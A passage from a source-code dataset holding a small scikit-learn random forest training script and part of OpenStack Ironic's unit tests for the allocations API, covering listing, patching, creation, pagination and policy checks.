] | null | null | null |
static/models/demos/RandomForest/train.py
|
jhuang-2021/Auto-build-machine-learning-platorm
|
37597a407e02b1fe2ed93ace78785b4e386aec58
|
[
"MIT"
] | null | null | null |
import pickle
# Author: Tim Head <betatim@gmail.com>
#
# License: BSD 3 clause
import numpy as np
import matplotlib.pyplot as plt
from sklearn.ensemble import RandomForestRegressor
from sklearn.model_selection import train_test_split
from sklearn.multioutput import MultiOutputRegressor
# Create a random dataset
rng = np.random.RandomState(1)
X = np.sort(200 * rng.rand(600, 1) - 100, axis=0)
y = np.array([np.pi * np.sin(X).ravel(), np.pi * np.cos(X).ravel()]).T
y += (0.5 - rng.rand(*y.shape))
X_train, X_test, y_train, y_test = train_test_split(
X, y, train_size=400, test_size=200, random_state=4)
max_depth = 30
model = MultiOutputRegressor(RandomForestRegressor(n_estimators=100,
max_depth=max_depth,
random_state=0))
model.fit(X_train, y_train)
# save the model to disk
filename = 'trained_model.mdl'
pickle.dump(model, open(filename, 'wb'))
| 29.484848
| 78
| 0.663926
|
7409ea2ae9b4b9441d60c0831676403966f6a9b1
| 62,803
|
py
|
Python
|
ironic/tests/unit/api/controllers/v1/test_allocation.py
|
ljmcgann/ironic
|
09f79416e2820cf0fcef001c4c956b7732b7e7ca
|
[
"Apache-2.0"
] | null | null | null |
ironic/tests/unit/api/controllers/v1/test_allocation.py
|
ljmcgann/ironic
|
09f79416e2820cf0fcef001c4c956b7732b7e7ca
|
[
"Apache-2.0"
] | null | null | null |
ironic/tests/unit/api/controllers/v1/test_allocation.py
|
ljmcgann/ironic
|
09f79416e2820cf0fcef001c4c956b7732b7e7ca
|
[
"Apache-2.0"
] | null | null | null |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Tests for the API /allocations/ methods.
"""
import datetime
from http import client as http_client
from unittest import mock
from urllib import parse as urlparse
import fixtures
from oslo_config import cfg
from oslo_utils import timeutils
from oslo_utils import uuidutils
from ironic.api.controllers import base as api_base
from ironic.api.controllers import v1 as api_v1
from ironic.api.controllers.v1 import allocation as api_allocation
from ironic.api.controllers.v1 import notification_utils
from ironic.api import types as atypes
from ironic.common import exception
from ironic.common import policy
from ironic.conductor import rpcapi
from ironic import objects
from ironic.objects import fields as obj_fields
from ironic.tests import base
from ironic.tests.unit.api import base as test_api_base
from ironic.tests.unit.api import utils as apiutils
from ironic.tests.unit.objects import utils as obj_utils
class TestAllocationObject(base.TestCase):
def test_allocation_init(self):
allocation_dict = apiutils.allocation_post_data(node_id=None)
del allocation_dict['extra']
allocation = api_allocation.Allocation(**allocation_dict)
self.assertEqual(atypes.Unset, allocation.extra)
class TestListAllocations(test_api_base.BaseApiTest):
headers = {api_base.Version.string: str(api_v1.max_version())}
def setUp(self):
super(TestListAllocations, self).setUp()
self.node = obj_utils.create_test_node(self.context, name='node-1')
def test_empty(self):
data = self.get_json('/allocations', headers=self.headers)
self.assertEqual([], data['allocations'])
def test_one(self):
allocation = obj_utils.create_test_allocation(self.context,
node_id=self.node.id)
data = self.get_json('/allocations', headers=self.headers)
self.assertEqual(allocation.uuid, data['allocations'][0]["uuid"])
self.assertEqual(allocation.name, data['allocations'][0]['name'])
self.assertEqual({}, data['allocations'][0]["extra"])
self.assertEqual(self.node.uuid, data['allocations'][0]["node_uuid"])
self.assertEqual(allocation.owner, data['allocations'][0]["owner"])
# never expose the node_id
self.assertNotIn('node_id', data['allocations'][0])
def test_get_one(self):
allocation = obj_utils.create_test_allocation(self.context,
node_id=self.node.id)
data = self.get_json('/allocations/%s' % allocation.uuid,
headers=self.headers)
self.assertEqual(allocation.uuid, data['uuid'])
self.assertEqual({}, data["extra"])
self.assertEqual(self.node.uuid, data["node_uuid"])
self.assertEqual(allocation.owner, data["owner"])
# never expose the node_id
self.assertNotIn('node_id', data)
def test_get_one_with_json(self):
allocation = obj_utils.create_test_allocation(self.context,
node_id=self.node.id)
data = self.get_json('/allocations/%s.json' % allocation.uuid,
headers=self.headers)
self.assertEqual(allocation.uuid, data['uuid'])
def test_get_one_with_json_in_name(self):
allocation = obj_utils.create_test_allocation(self.context,
name='pg.json',
node_id=self.node.id)
data = self.get_json('/allocations/%s' % allocation.uuid,
headers=self.headers)
self.assertEqual(allocation.uuid, data['uuid'])
def test_get_one_with_suffix(self):
allocation = obj_utils.create_test_allocation(self.context,
name='pg.1',
node_id=self.node.id)
data = self.get_json('/allocations/%s' % allocation.uuid,
headers=self.headers)
self.assertEqual(allocation.uuid, data['uuid'])
def test_get_one_custom_fields(self):
allocation = obj_utils.create_test_allocation(self.context,
node_id=self.node.id)
fields = 'resource_class,extra'
data = self.get_json(
'/allocations/%s?fields=%s' % (allocation.uuid, fields),
headers=self.headers)
# We always append "links"
self.assertCountEqual(['resource_class', 'extra', 'links'], data)
def test_get_collection_custom_fields(self):
fields = 'uuid,extra'
for i in range(3):
obj_utils.create_test_allocation(
self.context,
node_id=self.node.id,
uuid=uuidutils.generate_uuid(),
name='allocation%s' % i)
data = self.get_json(
'/allocations?fields=%s' % fields,
headers=self.headers)
self.assertEqual(3, len(data['allocations']))
for allocation in data['allocations']:
# We always append "links"
self.assertCountEqual(['uuid', 'extra', 'links'], allocation)
def test_get_custom_fields_invalid_fields(self):
allocation = obj_utils.create_test_allocation(self.context,
node_id=self.node.id)
fields = 'uuid,spongebob'
response = self.get_json(
'/allocations/%s?fields=%s' % (allocation.uuid, fields),
headers=self.headers, expect_errors=True)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertIn('spongebob', response.json['error_message'])
def test_get_one_invalid_api_version(self):
allocation = obj_utils.create_test_allocation(self.context,
node_id=self.node.id)
response = self.get_json(
'/allocations/%s' % (allocation.uuid),
headers={api_base.Version.string: str(api_v1.min_version())},
expect_errors=True)
self.assertEqual(http_client.NOT_FOUND, response.status_int)
def test_get_one_invalid_api_version_without_check(self):
# Invalid name, but the check happens after the microversion check.
response = self.get_json(
'/allocations/ba!na!na!',
headers={api_base.Version.string: str(api_v1.min_version())},
expect_errors=True)
self.assertEqual(http_client.NOT_FOUND, response.status_int)
def test_many(self):
allocations = []
for id_ in range(5):
allocation = obj_utils.create_test_allocation(
self.context, node_id=self.node.id,
uuid=uuidutils.generate_uuid(),
name='allocation%s' % id_)
allocations.append(allocation.uuid)
data = self.get_json('/allocations', headers=self.headers)
self.assertEqual(len(allocations), len(data['allocations']))
uuids = [n['uuid'] for n in data['allocations']]
self.assertCountEqual(allocations, uuids)
def test_links(self):
uuid = uuidutils.generate_uuid()
obj_utils.create_test_allocation(self.context,
uuid=uuid,
node_id=self.node.id)
data = self.get_json('/allocations/%s' % uuid, headers=self.headers)
self.assertIn('links', data)
self.assertEqual(2, len(data['links']))
self.assertIn(uuid, data['links'][0]['href'])
for link in data['links']:
bookmark = link['rel'] == 'bookmark'
self.assertTrue(self.validate_link(link['href'], bookmark=bookmark,
headers=self.headers))
def test_collection_links(self):
allocations = []
for id_ in range(5):
allocation = obj_utils.create_test_allocation(
self.context,
uuid=uuidutils.generate_uuid(),
name='allocation%s' % id_)
allocations.append(allocation.uuid)
data = self.get_json('/allocations/?limit=3', headers=self.headers)
self.assertEqual(3, len(data['allocations']))
next_marker = data['allocations'][-1]['uuid']
self.assertIn(next_marker, data['next'])
def test_collection_links_default_limit(self):
cfg.CONF.set_override('max_limit', 3, 'api')
allocations = []
for id_ in range(5):
allocation = obj_utils.create_test_allocation(
self.context,
uuid=uuidutils.generate_uuid(),
name='allocation%s' % id_)
allocations.append(allocation.uuid)
data = self.get_json('/allocations', headers=self.headers)
self.assertEqual(3, len(data['allocations']))
next_marker = data['allocations'][-1]['uuid']
self.assertIn(next_marker, data['next'])
def test_collection_links_custom_fields(self):
cfg.CONF.set_override('max_limit', 3, 'api')
fields = 'uuid,extra'
allocations = []
for i in range(5):
allocation = obj_utils.create_test_allocation(
self.context,
node_id=self.node.id,
uuid=uuidutils.generate_uuid(),
name='allocation%s' % i)
allocations.append(allocation.uuid)
data = self.get_json(
'/allocations?fields=%s' % fields,
headers=self.headers)
self.assertEqual(3, len(data['allocations']))
next_marker = data['allocations'][-1]['uuid']
self.assertIn(next_marker, data['next'])
self.assertIn('fields', data['next'])
def test_get_collection_pagination_no_uuid(self):
fields = 'node_uuid'
limit = 2
allocations = []
for id_ in range(3):
allocation = obj_utils.create_test_allocation(
self.context,
node_id=self.node.id,
uuid=uuidutils.generate_uuid(),
name='allocation%s' % id_)
allocations.append(allocation)
data = self.get_json(
'/allocations?fields=%s&limit=%s' % (fields, limit),
headers=self.headers)
self.assertEqual(limit, len(data['allocations']))
self.assertIn('marker=%s' % allocations[limit - 1].uuid, data['next'])
def test_allocation_get_all_invalid_api_version(self):
obj_utils.create_test_allocation(
self.context, node_id=self.node.id, uuid=uuidutils.generate_uuid(),
name='allocation_1')
response = self.get_json('/allocations',
headers={api_base.Version.string: '1.14'},
expect_errors=True)
self.assertEqual(http_client.NOT_FOUND, response.status_int)
@mock.patch.object(policy, 'authorize', spec=True)
def test_allocation_get_all_forbidden(self, mock_authorize):
def mock_authorize_function(rule, target, creds):
raise exception.HTTPForbidden(resource='fake')
mock_authorize.side_effect = mock_authorize_function
response = self.get_json('/allocations', expect_errors=True,
headers={
api_base.Version.string: '1.60',
'X-Project-Id': '12345'
})
self.assertEqual(http_client.FORBIDDEN, response.status_int)
@mock.patch.object(policy, 'authorize', spec=True)
def test_allocation_get_all_forbidden_no_project(self, mock_authorize):
def mock_authorize_function(rule, target, creds):
if rule == 'baremetal:allocation:list_all':
raise exception.HTTPForbidden(resource='fake')
return True
mock_authorize.side_effect = mock_authorize_function
response = self.get_json('/allocations', expect_errors=True,
headers={
api_base.Version.string: '1.59',
})
self.assertEqual(http_client.FORBIDDEN, response.status_int)
@mock.patch.object(policy, 'authorize', spec=True)
def test_allocation_get_all_forbid_owner_proj_mismatch(
self, mock_authorize):
def mock_authorize_function(rule, target, creds):
if rule == 'baremetal:allocation:list_all':
raise exception.HTTPForbidden(resource='fake')
return True
mock_authorize.side_effect = mock_authorize_function
response = self.get_json('/allocations?owner=54321',
expect_errors=True,
headers={
api_base.Version.string: '1.60',
'X-Project-Id': '12345'
})
self.assertEqual(http_client.FORBIDDEN, response.status_int)
@mock.patch.object(policy, 'authorize', spec=True)
def test_allocation_get_all_non_admin(self, mock_authorize):
def mock_authorize_function(rule, target, creds):
if rule == 'baremetal:allocation:list_all':
raise exception.HTTPForbidden(resource='fake')
return True
mock_authorize.side_effect = mock_authorize_function
allocations = []
for id in range(5):
allocation = obj_utils.create_test_allocation(
self.context,
uuid=uuidutils.generate_uuid(),
owner='12345')
allocations.append(allocation.uuid)
for id in range(2):
allocation = obj_utils.create_test_allocation(
self.context,
uuid=uuidutils.generate_uuid())
data = self.get_json('/allocations', headers={
api_base.Version.string: '1.60',
'X-Project-Id': '12345'})
self.assertEqual(len(allocations), len(data['allocations']))
uuids = [n['uuid'] for n in data['allocations']]
self.assertEqual(sorted(allocations), sorted(uuids))
def test_sort_key(self):
allocations = []
for id_ in range(3):
allocation = obj_utils.create_test_allocation(
self.context,
node_id=self.node.id,
uuid=uuidutils.generate_uuid(),
name='allocation%s' % id_)
allocations.append(allocation.uuid)
data = self.get_json('/allocations?sort_key=uuid',
headers=self.headers)
uuids = [n['uuid'] for n in data['allocations']]
self.assertEqual(sorted(allocations), uuids)
def test_sort_key_invalid(self):
invalid_keys_list = ['foo', 'extra', 'internal_info', 'properties']
for invalid_key in invalid_keys_list:
response = self.get_json('/allocations?sort_key=%s' % invalid_key,
expect_errors=True, headers=self.headers)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertIn(invalid_key, response.json['error_message'])
def test_sort_key_allowed(self):
allocation_uuids = []
for id_ in range(3, 0, -1):
allocation = obj_utils.create_test_allocation(
self.context,
uuid=uuidutils.generate_uuid(),
name='allocation%s' % id_)
allocation_uuids.append(allocation.uuid)
allocation_uuids.reverse()
data = self.get_json('/allocations?sort_key=name',
headers=self.headers)
data_uuids = [p['uuid'] for p in data['allocations']]
self.assertEqual(allocation_uuids, data_uuids)
def test_get_all_by_state(self):
for i in range(5):
if i < 3:
state = 'allocating'
else:
state = 'active'
obj_utils.create_test_allocation(
self.context,
state=state,
uuid=uuidutils.generate_uuid(),
name='allocation%s' % i)
data = self.get_json("/allocations?state=allocating",
headers=self.headers)
self.assertEqual(3, len(data['allocations']))
def test_get_all_by_owner(self):
for i in range(5):
if i < 3:
owner = '12345'
else:
owner = '54321'
obj_utils.create_test_allocation(
self.context,
owner=owner,
uuid=uuidutils.generate_uuid(),
name='allocation%s' % i)
data = self.get_json("/allocations?owner=12345",
headers=self.headers)
self.assertEqual(3, len(data['allocations']))
def test_get_all_by_owner_not_allowed(self):
response = self.get_json("/allocations?owner=12345",
headers={api_base.Version.string: '1.59'},
expect_errors=True)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.NOT_ACCEPTABLE, response.status_code)
self.assertTrue(response.json['error_message'])
def test_get_all_by_node_name(self):
for i in range(5):
if i < 3:
node_id = self.node.id
else:
node_id = 100000 + i
obj_utils.create_test_allocation(
self.context,
node_id=node_id,
uuid=uuidutils.generate_uuid(),
name='allocation%s' % i)
data = self.get_json("/allocations?node=%s" % self.node.name,
headers=self.headers)
self.assertEqual(3, len(data['allocations']))
def test_get_all_by_node_uuid(self):
obj_utils.create_test_allocation(self.context, node_id=self.node.id)
data = self.get_json('/allocations?node=%s' % (self.node.uuid),
headers=self.headers)
self.assertEqual(1, len(data['allocations']))
def test_get_all_by_non_existing_node(self):
obj_utils.create_test_allocation(self.context, node_id=self.node.id)
response = self.get_json('/allocations?node=banana',
headers=self.headers, expect_errors=True)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
def test_get_by_node_resource(self):
allocation = obj_utils.create_test_allocation(self.context,
node_id=self.node.id)
data = self.get_json('/nodes/%s/allocation' % self.node.uuid,
headers=self.headers)
self.assertEqual(allocation.uuid, data['uuid'])
self.assertEqual({}, data["extra"])
self.assertEqual(self.node.uuid, data["node_uuid"])
def test_get_by_node_resource_invalid_api_version(self):
obj_utils.create_test_allocation(self.context, node_id=self.node.id)
response = self.get_json(
'/nodes/%s/allocation' % self.node.uuid,
headers={api_base.Version.string: str(api_v1.min_version())},
expect_errors=True)
self.assertEqual(http_client.NOT_FOUND, response.status_int)
def test_get_by_node_resource_with_fields(self):
obj_utils.create_test_allocation(self.context, node_id=self.node.id)
data = self.get_json('/nodes/%s/allocation?fields=name,extra' %
self.node.uuid,
headers=self.headers)
self.assertNotIn('uuid', data)
self.assertIn('name', data)
self.assertEqual({}, data["extra"])
def test_get_by_node_resource_and_id(self):
allocation = obj_utils.create_test_allocation(self.context,
node_id=self.node.id)
response = self.get_json('/nodes/%s/allocation/%s' % (self.node.uuid,
allocation.uuid),
headers=self.headers, expect_errors=True)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.METHOD_NOT_ALLOWED, response.status_int)
def test_by_node_resource_not_existed(self):
node = obj_utils.create_test_node(self.context,
uuid=uuidutils.generate_uuid())
res = self.get_json('/node/%s/allocation' % node.uuid,
expect_errors=True, headers=self.headers)
self.assertEqual(http_client.NOT_FOUND, res.status_code)
def test_by_node_invalid_node(self):
res = self.get_json('/node/%s/allocation' % uuidutils.generate_uuid(),
expect_errors=True, headers=self.headers)
self.assertEqual(http_client.NOT_FOUND, res.status_code)
def test_allocation_owner_hidden_in_lower_version(self):
allocation = obj_utils.create_test_allocation(self.context,
node_id=self.node.id)
data = self.get_json(
'/allocations/%s' % allocation.uuid,
headers={api_base.Version.string: '1.59'})
self.assertNotIn('owner', data)
data = self.get_json(
'/allocations/%s' % allocation.uuid,
headers=self.headers)
self.assertIn('owner', data)
def test_allocation_owner_null_field(self):
allocation = obj_utils.create_test_allocation(self.context,
node_id=self.node.id,
owner=None)
data = self.get_json('/allocations/%s' % allocation.uuid,
headers=self.headers)
self.assertIsNone(data['owner'])
def test_allocation_owner_present(self):
allocation = obj_utils.create_test_allocation(self.context,
node_id=self.node.id,
owner='12345')
data = self.get_json('/allocations/%s' % allocation.uuid,
headers=self.headers)
self.assertEqual(data['owner'], '12345')
def test_get_owner_field(self):
allocation = obj_utils.create_test_allocation(self.context,
node_id=self.node.id,
owner='12345')
fields = 'owner'
response = self.get_json(
'/allocations/%s?fields=%s' % (allocation.uuid, fields),
headers=self.headers)
self.assertIn('owner', response)
class TestPatch(test_api_base.BaseApiTest):
headers = {api_base.Version.string: str(api_v1.max_version())}
def setUp(self):
super(TestPatch, self).setUp()
self.allocation = obj_utils.create_test_allocation(self.context)
def test_update_not_allowed(self):
response = self.patch_json('/allocations/%s' % self.allocation.uuid,
[{'path': '/extra/foo',
'value': 'bar',
'op': 'add'}],
expect_errors=True,
headers={api_base.Version.string: '1.56'})
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.METHOD_NOT_ALLOWED, response.status_int)
def test_update_not_found(self):
uuid = uuidutils.generate_uuid()
response = self.patch_json('/allocations/%s' % uuid,
[{'path': '/name', 'value': 'b',
'op': 'replace'}],
expect_errors=True,
headers=self.headers)
self.assertEqual(http_client.NOT_FOUND, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertTrue(response.json['error_message'])
def test_add(self):
response = self.patch_json('/allocations/%s' % self.allocation.uuid,
[{'path': '/extra/foo', 'value': 'bar',
'op': 'add'}], headers=self.headers)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.OK, response.status_int)
def test_add_non_existent(self):
response = self.patch_json('/allocations/%s' % self.allocation.uuid,
[{'path': '/foo', 'value': 'bar',
'op': 'add'}],
expect_errors=True,
headers=self.headers)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertTrue(response.json['error_message'])
def test_add_multi(self):
response = self.patch_json('/allocations/%s' % self.allocation.uuid,
[{'path': '/extra/foo1', 'value': 'bar1',
'op': 'add'},
{'path': '/extra/foo2', 'value': 'bar2',
'op': 'add'}], headers=self.headers)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.OK, response.status_code)
result = self.get_json('/allocations/%s' % self.allocation.uuid,
headers=self.headers)
expected = {"foo1": "bar1", "foo2": "bar2"}
self.assertEqual(expected, result['extra'])
def test_replace_invalid_name(self):
response = self.patch_json('/allocations/%s' % self.allocation.uuid,
[{'path': '/name', 'value': '[test]',
'op': 'replace'}],
expect_errors=True,
headers=self.headers)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertTrue(response.json['error_message'])
@mock.patch.object(notification_utils, '_emit_api_notification')
@mock.patch.object(timeutils, 'utcnow')
def test_replace_singular(self, mock_utcnow, mock_notify):
test_time = datetime.datetime(2000, 1, 1, 0, 0)
mock_utcnow.return_value = test_time
response = self.patch_json('/allocations/%s' % self.allocation.uuid,
[{'path': '/name',
'value': 'test', 'op': 'replace'}],
headers=self.headers)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.OK, response.status_code)
result = self.get_json('/allocations/%s' % self.allocation.uuid,
headers=self.headers)
self.assertEqual('test', result['name'])
return_updated_at = timeutils.parse_isotime(
result['updated_at']).replace(tzinfo=None)
self.assertEqual(test_time, return_updated_at)
mock_notify.assert_has_calls([mock.call(mock.ANY, mock.ANY, 'update',
obj_fields.NotificationLevel.INFO,
obj_fields.NotificationStatus.START),
mock.call(mock.ANY, mock.ANY, 'update',
obj_fields.NotificationLevel.INFO,
obj_fields.NotificationStatus.END)])
def test_replace_name_with_none(self):
response = self.patch_json('/allocations/%s' % self.allocation.uuid,
[{'path': '/name',
'value': None, 'op': 'replace'}],
headers=self.headers)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.OK, response.status_code)
result = self.get_json('/allocations/%s' % self.allocation.uuid,
headers=self.headers)
self.assertIsNone(result['name'])
@mock.patch.object(notification_utils, '_emit_api_notification')
@mock.patch.object(objects.Allocation, 'save')
def test_update_error(self, mock_save, mock_notify):
mock_save.side_effect = Exception()
allocation = obj_utils.create_test_allocation(self.context)
self.patch_json('/allocations/%s' % allocation.uuid, [{'path': '/name',
'value': 'new', 'op': 'replace'}],
expect_errors=True, headers=self.headers)
mock_notify.assert_has_calls([mock.call(mock.ANY, mock.ANY, 'update',
obj_fields.NotificationLevel.INFO,
obj_fields.NotificationStatus.START),
mock.call(mock.ANY, mock.ANY, 'update',
obj_fields.NotificationLevel.ERROR,
obj_fields.NotificationStatus.ERROR)])
def test_replace_multi(self):
extra = {"foo1": "bar1", "foo2": "bar2", "foo3": "bar3"}
allocation = obj_utils.create_test_allocation(
self.context, extra=extra, uuid=uuidutils.generate_uuid())
new_value = 'new value'
response = self.patch_json('/allocations/%s' % allocation.uuid,
[{'path': '/extra/foo2',
'value': new_value, 'op': 'replace'}],
headers=self.headers)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.OK, response.status_code)
result = self.get_json('/allocations/%s' % allocation.uuid,
headers=self.headers)
extra["foo2"] = new_value
self.assertEqual(extra, result['extra'])
def test_remove_uuid(self):
response = self.patch_json('/allocations/%s' % self.allocation.uuid,
[{'path': '/uuid', 'op': 'remove'}],
expect_errors=True,
headers=self.headers)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertTrue(response.json['error_message'])
def test_remove_singular(self):
allocation = obj_utils.create_test_allocation(
self.context, extra={'a': 'b'}, uuid=uuidutils.generate_uuid())
response = self.patch_json('/allocations/%s' % allocation.uuid,
[{'path': '/extra/a', 'op': 'remove'}],
headers=self.headers)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.OK, response.status_code)
result = self.get_json('/allocations/%s' % allocation.uuid,
headers=self.headers)
self.assertEqual(result['extra'], {})
# Assert nothing else was changed
self.assertEqual(allocation.uuid, result['uuid'])
def test_remove_multi(self):
extra = {"foo1": "bar1", "foo2": "bar2", "foo3": "bar3"}
allocation = obj_utils.create_test_allocation(
self.context, extra=extra, uuid=uuidutils.generate_uuid())
# Removing one item from the collection
response = self.patch_json('/allocations/%s' % allocation.uuid,
[{'path': '/extra/foo2', 'op': 'remove'}],
headers=self.headers)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.OK, response.status_code)
result = self.get_json('/allocations/%s' % allocation.uuid,
headers=self.headers)
extra.pop("foo2")
self.assertEqual(extra, result['extra'])
# Removing the collection
response = self.patch_json('/allocations/%s' % allocation.uuid,
[{'path': '/extra', 'op': 'remove'}],
headers=self.headers)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.OK, response.status_code)
result = self.get_json('/allocations/%s' % allocation.uuid,
headers=self.headers)
self.assertEqual({}, result['extra'])
# Assert nothing else was changed
self.assertEqual(allocation.uuid, result['uuid'])
def test_remove_non_existent_property_fail(self):
response = self.patch_json(
'/allocations/%s' % self.allocation.uuid,
[{'path': '/extra/non-existent', 'op': 'remove'}],
expect_errors=True, headers=self.headers)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.BAD_REQUEST, response.status_code)
self.assertTrue(response.json['error_message'])
def test_update_owner_not_acceptable(self):
allocation = obj_utils.create_test_allocation(
self.context, owner='12345', uuid=uuidutils.generate_uuid())
new_owner = '54321'
response = self.patch_json('/allocations/%s' % allocation.uuid,
[{'path': '/owner',
'value': new_owner,
'op': 'replace'}],
expect_errors=True, headers=self.headers)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.BAD_REQUEST, response.status_code)
def _create_locally(_api, _ctx, allocation, topic):
if 'node_id' in allocation and allocation.node_id:
assert topic == 'node-topic', topic
else:
assert topic == 'some-topic', topic
allocation.create()
return allocation
@mock.patch.object(rpcapi.ConductorAPI, 'create_allocation', _create_locally)
class TestPost(test_api_base.BaseApiTest):
headers = {api_base.Version.string: str(api_v1.max_version())}
def setUp(self):
super(TestPost, self).setUp()
self.mock_get_topic = self.useFixture(
fixtures.MockPatchObject(rpcapi.ConductorAPI, 'get_random_topic')
).mock
self.mock_get_topic.return_value = 'some-topic'
self.mock_get_topic_for_node = self.useFixture(
fixtures.MockPatchObject(rpcapi.ConductorAPI, 'get_topic_for')
).mock
self.mock_get_topic_for_node.return_value = 'node-topic'
@mock.patch.object(notification_utils, '_emit_api_notification')
@mock.patch.object(timeutils, 'utcnow', autospec=True)
def test_create_allocation(self, mock_utcnow, mock_notify):
adict = apiutils.allocation_post_data()
test_time = datetime.datetime(2000, 1, 1, 0, 0)
mock_utcnow.return_value = test_time
response = self.post_json('/allocations', adict,
headers=self.headers)
self.assertEqual(http_client.CREATED, response.status_int)
self.assertEqual(adict['uuid'], response.json['uuid'])
self.assertEqual('allocating', response.json['state'])
self.assertIsNone(response.json['node_uuid'])
self.assertEqual([], response.json['candidate_nodes'])
self.assertEqual([], response.json['traits'])
self.assertNotIn('node', response.json)
result = self.get_json('/allocations/%s' % adict['uuid'],
headers=self.headers)
self.assertEqual(adict['uuid'], result['uuid'])
self.assertFalse(result['updated_at'])
self.assertIsNone(result['node_uuid'])
self.assertEqual([], result['candidate_nodes'])
self.assertEqual([], result['traits'])
self.assertIsNone(result['owner'])
self.assertNotIn('node', result)
return_created_at = timeutils.parse_isotime(
result['created_at']).replace(tzinfo=None)
self.assertEqual(test_time, return_created_at)
# Check location header
self.assertIsNotNone(response.location)
expected_location = '/v1/allocations/%s' % adict['uuid']
self.assertEqual(urlparse.urlparse(response.location).path,
expected_location)
mock_notify.assert_has_calls([
mock.call(mock.ANY, mock.ANY, 'create',
obj_fields.NotificationLevel.INFO,
obj_fields.NotificationStatus.START),
mock.call(mock.ANY, mock.ANY, 'create',
obj_fields.NotificationLevel.INFO,
obj_fields.NotificationStatus.END),
])
def test_create_allocation_invalid_api_version(self):
adict = apiutils.allocation_post_data()
response = self.post_json(
'/allocations', adict, headers={api_base.Version.string: '1.50'},
expect_errors=True)
self.assertEqual(http_client.METHOD_NOT_ALLOWED, response.status_int)
def test_create_allocation_doesnt_contain_id(self):
with mock.patch.object(self.dbapi, 'create_allocation',
wraps=self.dbapi.create_allocation) as cp_mock:
adict = apiutils.allocation_post_data(extra={'foo': 123})
self.post_json('/allocations', adict, headers=self.headers)
result = self.get_json('/allocations/%s' % adict['uuid'],
headers=self.headers)
self.assertEqual(adict['extra'], result['extra'])
cp_mock.assert_called_once_with(mock.ANY)
# Check that 'id' is not in first arg of positional args
self.assertNotIn('id', cp_mock.call_args[0][0])
@mock.patch.object(notification_utils.LOG, 'exception', autospec=True)
@mock.patch.object(notification_utils.LOG, 'warning', autospec=True)
def test_create_allocation_generate_uuid(self, mock_warn, mock_except):
adict = apiutils.allocation_post_data()
del adict['uuid']
response = self.post_json('/allocations', adict, headers=self.headers)
result = self.get_json('/allocations/%s' % response.json['uuid'],
headers=self.headers)
self.assertTrue(uuidutils.is_uuid_like(result['uuid']))
self.assertFalse(mock_warn.called)
self.assertFalse(mock_except.called)
@mock.patch.object(notification_utils, '_emit_api_notification')
@mock.patch.object(objects.Allocation, 'create')
def test_create_allocation_error(self, mock_create, mock_notify):
mock_create.side_effect = Exception()
adict = apiutils.allocation_post_data()
self.post_json('/allocations', adict, headers=self.headers,
expect_errors=True)
mock_notify.assert_has_calls([
mock.call(mock.ANY, mock.ANY, 'create',
obj_fields.NotificationLevel.INFO,
obj_fields.NotificationStatus.START),
mock.call(mock.ANY, mock.ANY, 'create',
obj_fields.NotificationLevel.ERROR,
obj_fields.NotificationStatus.ERROR),
])
def test_create_allocation_with_candidate_nodes(self):
node1 = obj_utils.create_test_node(self.context,
name='node-1')
node2 = obj_utils.create_test_node(self.context,
uuid=uuidutils.generate_uuid())
adict = apiutils.allocation_post_data(
candidate_nodes=[node1.name, node2.uuid])
response = self.post_json('/allocations', adict,
headers=self.headers)
self.assertEqual(http_client.CREATED, response.status_int)
result = self.get_json('/allocations/%s' % adict['uuid'],
headers=self.headers)
self.assertEqual(adict['uuid'], result['uuid'])
self.assertEqual([node1.uuid, node2.uuid], result['candidate_nodes'])
def test_create_allocation_valid_extra(self):
adict = apiutils.allocation_post_data(
extra={'str': 'foo', 'int': 123, 'float': 0.1, 'bool': True,
'list': [1, 2], 'none': None, 'dict': {'cat': 'meow'}})
self.post_json('/allocations', adict, headers=self.headers)
result = self.get_json('/allocations/%s' % adict['uuid'],
headers=self.headers)
self.assertEqual(adict['extra'], result['extra'])
def test_create_allocation_with_no_extra(self):
adict = apiutils.allocation_post_data()
del adict['extra']
response = self.post_json('/allocations', adict, headers=self.headers)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.CREATED, response.status_int)
def test_create_allocation_no_mandatory_field_resource_class(self):
adict = apiutils.allocation_post_data()
del adict['resource_class']
response = self.post_json('/allocations', adict, expect_errors=True,
headers=self.headers)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertIn('resource_class', response.json['error_message'])
def test_create_allocation_resource_class_too_long(self):
adict = apiutils.allocation_post_data()
adict['resource_class'] = 'f' * 81
response = self.post_json('/allocations', adict, expect_errors=True,
headers=self.headers)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertTrue(response.json['error_message'])
def test_create_allocation_with_traits(self):
adict = apiutils.allocation_post_data()
adict['traits'] = ['CUSTOM_GPU', 'CUSTOM_FOO_BAR']
